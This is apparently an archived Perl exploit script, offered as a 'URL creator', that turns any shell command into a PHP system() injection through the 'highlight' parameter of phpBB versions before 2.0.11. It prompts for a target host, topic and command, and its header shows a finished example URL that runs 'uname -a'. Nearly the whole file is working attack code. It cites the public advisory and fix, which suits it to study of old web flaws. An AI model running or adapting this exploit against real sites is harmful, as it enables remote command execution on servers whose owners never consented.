home *** CD-ROM | disk | FTP | other *** search
- #!/usr/bin/perl -w
- # Code that automate the creation of the URL to exploit phpBB < 2.0.11
- # Discovered by Zeelock and descibed at http://www.securityfocus.com/bid/10701
- # and http://www.packetstormsecurity.org/0411-exploits/phpbb2011.txt
- # Fix: http://www.securityfocus.com/bid/10701/solution/
- #
- # Example of execution:
- #
- # Insert the hostname of the target, with, if necessary,
- # the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): http://www.hostname.com/phpbb/
- # Insert a valid topic number (viewtopic.php?t=[topic_number]): 542
- # Insert the command to execute on the target: uname -a
- # This is the final URL: http://www.hostname.com/phpbb/viewtopic.php?t=542&highlight=%2527%252esystem(chr(117)
- # %252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527
- #
- # by albythebest - http://albythebest.altervista.org/
-
- print "#########################################################\n";
- print "# phpBB < 2.0.11 Vulnerability URL Creator - BID: 10701 #\n";
- print "#########################################################\n";
- print " http://albythebest.altervista.org/\n\n";
- print "Insert the hostname of the target, with, if necessary,
- the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): ";
- $host=<stdin>;
- chomp $host;
- print "Insert a valid topic number (viewtopic.php?t=[topic_number]): ";
- $topic=<stdin>;
- chomp $topic;
- print "Insert the command to execute on the target: ";
- $comando=<stdin>;
- chomp $comando;
- @command=split(//,$comando);
- print "This is the final URL: ",$host,"viewtopic.php?t=",$topic,"&highlight=%2527%252esystem(chr(";
- print ord("$command[0]");
- for($indice=1;$indice<@command;$indice++) {
- print ")%252echr(",ord("$command[$indice]");
- }
- print "))%252e%2527\n";